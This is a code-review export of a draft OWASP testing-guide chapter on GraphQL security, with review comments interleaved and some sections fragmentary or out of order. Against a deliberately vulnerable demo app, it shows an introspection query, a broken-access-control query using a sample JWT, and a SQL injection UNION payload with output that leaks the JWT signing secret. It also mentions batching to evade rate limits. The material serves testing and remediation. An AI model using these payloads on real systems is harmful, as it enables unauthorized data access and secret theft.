[GraphQL Playground](https://github.com/graphql/graphql-playground) is a GraphQL client. It can be used to test different queries, as well as divide GraphQL IDEs into different playgrounds, and group them by theme or by assigning a name to them. Much like GraphiQL, Playground can create documentation for you without the need for manually sending introspection queries and processing the response(s). It has another great advantage: It doesn't need the GraphiQL interface to be available. You can direct the tool to the GraphQL node via a URL, or use it locally with a data file. GraphQL Playground can be used to test for vulnerabilities directly, so you don't need to use a personal proxy to send HTTP requests. This means you can use this tool for simple interaction with and assessment of GraphQL. For other more advanced payloads, use a personal proxy.

Note that in some cases, you will need to set the HTTP headers at the bottom, to include session ID or other mechanism of authentication. This still allows creating multiple "IDEs" with different permissions to verify if there are in fact authorization issues.

![Playground1](images/Playground1.png)\

> _Figure 12.1-2: GraphQL Playground High Level API Docs_

Reviewer 5: *Figure 12.1-2: GraphQL Playground High Level API Docs*

![Playground2](images/Playground2.png)\

> _Figure 12.1-3: GraphQL Playground API Schema_

Reviewer 5: *Figure 12.1-3: GraphQL Playground API Schema*

Introspection is a useful tool that allows users to gain more information about the GraphQL deployment. However, this will also allow malicious users to gain access to the same information. The best practice is to limit access to the introspection queries, since some tools or requests might fail if this feature is disabled altogether. As GraphQL usually bridges to the back end APIs of the system, it's better to enforce strict access control.

### Authorization

Introspection is the first place to look for authorization problems. As noted, access to introspection should be restricted as it allows for data extraction and data gathering. Once a tester has access to the schema and knowledge of the sensitive information there is to extract, they should then send queries that will not be blocked due to insufficient privileges. GraphQL does not enforce permissions by default, and so it is up to the application to perform authorization enforcement.

In the earlier examples, the output of the introspection query shows there is a query called `auth`. This seems like a good place to extract sensitive information such as API tokens, passwords, etc.

![Auth GraphQL Query](images/auth1.png)\

> _Figure 12.1-4: GraphQL Auth Query API_

Reviewer 5: *Figure 12.1-4: GraphQL Auth Query API*

  - Set maximum query complexity: limit the complexity of queries to mitigate the abuse of GraphQL resources.
  - Use server-time-based throttling: limit the amount of server time a user can consume.
  - Use query-complexity-based throttling: limit the total complexity of queries a user can consume.
- Send generic error messages: use generic error messages that do not reveal details of the deployment.
- Mitigate batching attacks:
  - Add object request rate limiting in code.
  - Prevent batching for sensitive objects.
  - Limit the number of queries that can run at one time.

For more on remediating GraphQL weaknesses, refer to the [GraphQL Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html).

## Tools

- [GraphQL Playground](https://github.com/prisma-labs/graphql-playground)
- [GraphQL Voyager](https://apis.guru/graphql-voyager/)
- [sqlmap](https://github.com/sqlmapproject/sqlmap)
- [InQL (Burp Extension)](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f)
- [GraphQL Raider (Burp Extension)](https://portswigger.net/bappstore/4841f0d78a554ca381c65b26d48207e6)

> - [GraphQL (Add-on for OWASP ZAP](https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap/)

Reviewer 2: ```suggestion
- [GraphQL (Add-on for OWASP ZAP)](https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap/)
```

## References

- [poc-graphql](https://github.com/righettod/poc-graphql)
- [GraphQL Official Site](https://graphql.org/learn/)
- [Howtographql - Security](https://www.howtographql.com/advanced/4-security/)
- [GraphQL Constraint Directive](https://github.com/confuser/graphql-constraint-directive)

> - [User side testing (XSS and other vulnerabilities)](https://github.com/OWASP/wstg/tree/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing)

Reviewer 2: ```suggestion
- [Client-side Testing](../11-Client-side_Testing) (XSS and other vulnerabilities)
```

The guide will use a demo vulnerable application which uses GraphQL for the API access in order to demonstrate vulnerable a GraphQL node.

The guide will be based on a vulnerable GraphQL application [poc-graphql](https://github.com/righettod/poc-graphql), which is run in a docker container which maps localhost:8080/GraphQL as the vulnerable GraphQL node.

## Test Objectives

Assess GraphQL's security configuration, as well as other common vulnerabilities which might affect GraphQL deployments.

## How to Test

Testing GraphQL nodes is not very different than testing other API technologies. This Guide suggests following these steps:

### Introspection Queries

A little bit of background:
"It's often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so using the introspection system!"
[GraphQL.org-Introspection](https://graphql.org/learn/introspection/)
Introspection queries are the way GraphQL lets you ask it what queries it supports, which data types are available, and many more details you will need when approaching to test a GraphQL deployment. This is a good starting point on the information gathering phase.

> 

Reviewer: Edit: Typo + comma, and set the introspection link inline

There are a couple of ways to extract that and visualize the output:

#### Using Native GraphQL Introspection

The most straight-forward way is to send an HTTP request (using a proxy like Burp) with the following payload, taken from an article on [Medium](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) :

```json
query IntrospectionQuery {

>   __schema {

Reviewer: After I did my research, I linked to a certain gist that had that same body. I found this in several spots. It goes out to ask for all types of queries and possible types.

>   __schema {

Reviewer 2: Okay, fair enough.

          "interfaces": null,
          "enumValues": [
            {
              "name": "SCALAR",
              "description": "Indicates this type is a scalar.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "OBJECT",
              "description": "Indicates this type is an object. `fields` and `interfaces` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "INTERFACE",
              "description": "Indicates this type is an interface. `fields` and `possibleTypes` are valid fields.",
              "isDeprecated": false,
              "deprecationReason": null
            },
            {
              "name": "UNION",
              "description": "Indicates this type is a union. `possibleTypes` is a valid field.",
              "isDeprecated": false,
              "deprecationReason": null
            },
          ],
          "possibleTypes": null
        }
      ]
    }
  }
}
```

Now use GraphQL Voyager to get a better look on the output:

![GraphQL Voyager](images/Voyager.png)

> This tool creates an ERD representation of the GraphQL scheme, allowing you to get a better look into the moving parts of the system you're testing.  

Author: added (and it wasn't enterprise rate discount :D)

Much like GraphiQL Playgrounds can create the documentation for you, without the need to manually sending introspection and processing the response but with one great advantage, it doesn't need GraphiQL interface to be available.  
Another upside for this tool, is that it works just by directing the tool to the GraphQL node via a URL (there is also the option of using it locally with the data file) and then the magic happens without any user interaction.  
Another advantage of the tool is that it can be used to test for vulnerabilities directly, you don't need to use a proxy to send HTTP requests (Burp for example), and so you can use this tool in order to manually play with GraphQL and use Burp for other, more advanced payloads.  
Note that in some cases you will need to set the HTTP headers at the bottom, to include session ID or other mechanism of authentication, but this still allows creating multiple "IDEs" with different permissions to verify if there are in fact authorization issues.

![Playgrounds1](images/Playgrounds1.png)
![Playgrounds2](images/Playgrounds2.png)

> You can even download the schemes to use in Voyager.

Author: schema, changed it all over the doc, thanks!

```json
query brokenAccessControl {
  myInfo(accessToken:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJwb2MiLCJzdWIiOiJKdWxpZW4iLCJpc3MiOiJBdXRoU3lzdGVtIiwiZXhwIjoxNjAzMjkxMDE2fQ.r3r0hRX_t7YLiZ2c2NronQ0eJp8fSs-sOUpLyK844ew", veterinaryId: 2){
    id, name, dogs {
      name
    }
  }
}
```

And the response:

```json
{
  "data": {
    "myInfo": {
      "id": 2,
      "name": "Benoit",
      "dogs": [
        {
          "name": "Babou"
        },
        {
          "name": "Baboune"
        },
        {
          "name": "Babylon"
        },
        {
          "name": "Banko"
        },
        {
          "name": "Banzai"
        },
        {
          "name": "Bao"
        },
        {
          "name": "Barakouda"
        },
        {
          "name": "Barba"
        },
        {
          "name": "Barbara"
        },
        {
          "name": "Bebe"
        },
        {
          "name": "Becker"
        }
      ]
    }
  }
}
```

All of the dogs in the list belong to Benoit and not to the veterinarian which sent the request (and owns the auth token).

### Injection

> GraphQL is the implementation of the API layer of an application, and as such, it usually forwards the requests to a backend API or the database directly. This allows you to utilize any underlying vulnerability such as SQL injection, command injection, cross-site scripting, and basically, everything you expect to find in WEB applications, using GraphQL just changes the entry point of the malicious payload.

Reviewer 2: ```suggestion
GraphQL is the implementation of the API layer of an application, and as such, it usually forwards the requests to a backend API or the database directly. This allows you to utilize any underlying vulnerability such as SQL injection, command injection, cross-site scripting, and basically, everything you expect to find in web applications, using GraphQL just changes the entry point of the malicious payload.
```

You can refer to other guides within the OWASP testing guide to get some ideas.

#### SQL Injection

> The application is vulnerable by design in the `dogs(namePrefix: String, limit: Int = 500): [Dog!]`  since the parameter "namePrefix" is concatenated in the SQL query. Concatenating user input is a common malpractice of applications which exposes them to SQL injection.

Reviewer 2: ```suggestion
The example application is vulnerable by design in the query `dogs(namePrefix: String, limit: Int = 500): [Dog!]`  since the parameter "namePrefix" is concatenated in the SQL query. Concatenating user input is a common malpractice of applications which exposes them to SQL injection.
```

The following query extracts information from the CONFIG table within the database:

```graphql
query sqli {
  dogs(namePrefix: "ab%' UNION ALL SELECT 50 AS ID, C.CFGVALUE AS NAME, NULL AS VETERINARY_ID FROM CONFIG C LIMIT ? -- ", limit: 1000) {
    id
    name
  }
}
```

The response to this query is:

```json
{
  "data": {
    "dogs": [
      {
        "id": 1,
        "name": "Abi"
      },
      {
        "id": 2,
        "name": "Abime"
      },
      {
        "id": 50,
        "name": "$Nf!S?(.}DtV2~:Txw6:?;D!M+Z34^"
      }
    ]
  }
}
```

The query contains the secret which signs JWTs in the example application, which is very sensitive information. Please note that in order to know what to look for you will need to collect information and learn about how the application is built as well as how the database tables are organized.  

> Another thing you can do, is use tools like sqlmap to look for injection paths and even automating the extraction of data from the database.

Reviewer 2: ```suggestion
Another thing you can do, is use tools like sqlmap to look for injection paths and even automate the extraction of data from the database.
```

#### Cross-Site Scripting (XSS)

Cross-Site scripting occurs when the browser treats data that should be displayed as code that should be executed, creating the opportunity to run malicious code in a user's browser.  

> Reflection of input might cause XSS, but that is up to how the application is implemented, wether in encodes the output, so the best practice would be to test for XSS using a payload from [WSTG](https://github.com/OWASP/wstg/tree/master/document/4-Web_Application_Security_Testing/11-Client-side_Testing).  

Reviewer 2: ```suggestion
Reflection of input might cause XSS, but that is up to how the application is implemented, whether in encodes the output, so the best practice would be to test for XSS using a payload from [Testing for Reflected Cross Site Scripting](../07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting.md).  
```

      "validationErrorType": "WrongType",
      "queryPath": [
        "myInfo"
      ],
      "errorType": "ValidationError",
      "extensions": null,
      "path": null
    }
  ]
}
```

When it comes to injections, each vulnerability has many ways to remediate, as well as multiple security measures which should be in-place as part of the best practice, and as such will not be extensively covered in this guide.

The first line of defence when it comes to injections is input validation.  
Input validation does just that, validates the input sent to the application. GraphQL does not have a native way to validate input (except for assigning data types, but a string can contain every string without limitations), however, there is an open source project called ["graphql-constraint-directive"](https://github.com/confuser/graphql-constraint-directive) which allows for input validation as part of the scheme definition.  
For example, in the example above, the namePrefix can be limited to just containing letters, with no special characters. By blocking special characters, escaping the SQL query will not be possible and the SQL injection will not work since the query will be rejected.

> Input validation alone will be good, but it will not block everything (there is no 100% security), and additional measures should be implemented as well.

Reviewer 2: This should be summarized in a few bullets and added to "Remediation" below.

Author: Just to clarify, do you mean delete these lines and just add input validation in the remediation section? (which it already contains), or to add some of the information from these lines to the remediation section?
Both would be OK for me, I tried to add every remediation action into the remediation section but maybe we would want to add some more information to the bullets there, since it doesn't go into details very deeply.

Reviewer 2: The comment was about everything 404 thru 410.

**Note**: There are also scalars in GraphQL, which are usually used for custom data types which do not have native data types (DateTime for example). These types of data do not have out of the box validation as well, and you should look at them as well while testing.

### Abusive Queries

> GraphQL exposes a very simple interface, to allow developers use nested queries and nested objects. This ability can also be used in a malicious way, by calling a deep nested query similar to a recursive function, causing a denial of service by using too much CPU.

Reviewer 2: or Memory?

Author: you're right, I added a memory and noted that other compute resources might be abused as well (disk? for example).

```graphql
query dos {
  allDogs(limit:5){  ##complexity 5
    id  ##complexity 1
  }
}
```

After defining complexity the application can enforce maximum query complexity, preventing too complex queries from being executed.

#### Throttling

Throttling allows to limit users usage of resources. Throttling can be implemented on 2 of the applications resources:

##### Throttling Server Time

Throttle using server time limits the amount of server time the user gets, within a specified period of time. For example, the application can allow a user 100ms of server time every second with a maximum 1000ms time. This implementation will allow the user to accumulate 1 second of server time which will take 10 seconds to accumulate, and if a malicious user tries to execute  3 queries which take 400ms each, the 3rd one will be blocked until sufficient server time is accumulated again preventing a single user to cause a denial of service.

##### Throttling Based on Query Complexity

Throttling using the query complexity will be the same as limiting using server time, the user gets a specified complexity per time unit, without the ability to exceeding it.

> 

Reviewer 2: 469 thru 503.

This is great information but it's too remediation or developer centric. It would be better (I think) to turn this into a set of bullets: "Testers should consider testing for bypasses of the following types of controls or limits:" or something like that..... I'm open to your feedback/ideas.

Reviewer 2: Actually include "Detailed Error Message" in that too.

Author: I can turn it into bullets and make it a bit more brief. In that case, do you think it should be under remediation or keep the structure as it is and just write a short description and an appropriate link?

Reviewer 2: If it's tester centric then it can stay here as bullets, if it's remediation centric then it should be relocated.

Author: OK I agree, I'm moving it to remediation and try to make it tester centric (and what doesn't fit will be removed).
I think I'll push an update in a couple of minutes.
Thanks for the review!

In any case of errors within an application, the best practice is to send a generic string like "An error occurred" with a UID that does not reveal information to the user, and can be used by the application maintainers in order to understand what happened, and GraphQL implementations are no different.

### Exposure of Underlying API

GraphQL is a new technology, and some deployments are for transitioning from old APIs to GraphQL. In many cases, this kind of deployment is to use GraphQL as a standard API which translates requests (sent using GraphQL syntax) to an underlying API, as well as the responses. If the requests are not properly checked, the path of parameters being passed, might be changed by the user. For example, a request contains an `id=1/delete` might translate to `/api/users/1/delete`, or a manipulation of other resources of that user. Also note that the request is now sent with the authorization of the GraphQL node, which is probably on higher privileges than a common user.

> The remediation for these types of vulnerabilities is both input validation and awareness of the a possible issue, since authorization problems might also occur.

Reviewer 2: ```suggestion
```

I think this is un-necessary, the next section is remediation, which as mentioned above should have bullets for all the things we want testers (and devs) to be aware of.

## Remediation

1. Restrict access to introspection queries
2. Implement input validation
3. Implement security measures to prevent abusive queries

> 4. Sending generic error messages

Reviewer 2: Are these actually ordered? If not please use asterisks and finish them with periods.

Author: done

## Tools

- [GraphQL Playground](https://github.com/prisma-labs/graphql-playground)
- [sqlmap](https://github.com/sqlmapproject/sqlmap)

> 
> ### Burp GraphQL Extensions
> 
> - [InQL](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f)
> - [GraphQL Raider](https://portswigger.net/bappstore/4841f0d78a554ca381c65b26d48207e6)
> 
> ### Zap Proxy Extensions
> 
> - [GraphQL addon for (OWASP) ZAP](https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap/)

Reviewer 2: ```suggestion

- [InQL (Burp Extension)](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f)
- [GraphQL Raider (Burp Extension)](https://portswigger.net/bappstore/4841f0d78a554ca381c65b26d48207e6)
- [GraphQL (Add-on for OWASP ZAP](https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap/)
```

### Introspection Queries

> Introspection queries are the way GraphQL lets you ask what queries are supported, which data types are available, and many more details you will need when approaching a test of a GraphQL deployment.  

Reviewer 2: Re:

>document/4-Web_Application_Security_Testing/12-API_Testing/01-Testing_GraphQL.md:27:200 MD009/no-trailing-spaces Trailing spaces [Expected: 0 or 2; Actual: 1]

It allows 2 because the old school typewriter rule was period space space between sentences. If it's the end of a paragraph it should actually be 0.

So while what you've done is "allowed" by the linter it isn't actually the spirit of what should be done here 😉

Author: hmmm, I have to say the lesson on typewriters was interesting! and well, this is my first time writing something long in Markdown while applying all the linter rules so thanks for directing me in the right way (I have missed this comment 2 days ago, probably while I was sending another commit).
Are there any additional fixes you see in the last version of the PR @kingthorin ?

Author: I went over the doc (to see if I did that in any other places) and it seems this was the only case. I've pushed another commit, let me know how it looks, thanks again!

]
```

> In the example application, a single request can be sent in order to extract all of the veterinary names using the guessable ID (it's an increasing integer). An attacker can then utilize the names in order to get access tokens. Instead of doing so in many requests, which might be blocked by a network security measure like a web application firewall (WAF) or a rate limiter like Nginx, these requests may be batched. This means there would only be a couple of requests, which may allow for efficient brute forcing without being detected. Here is an example query:

Author: Deleted.
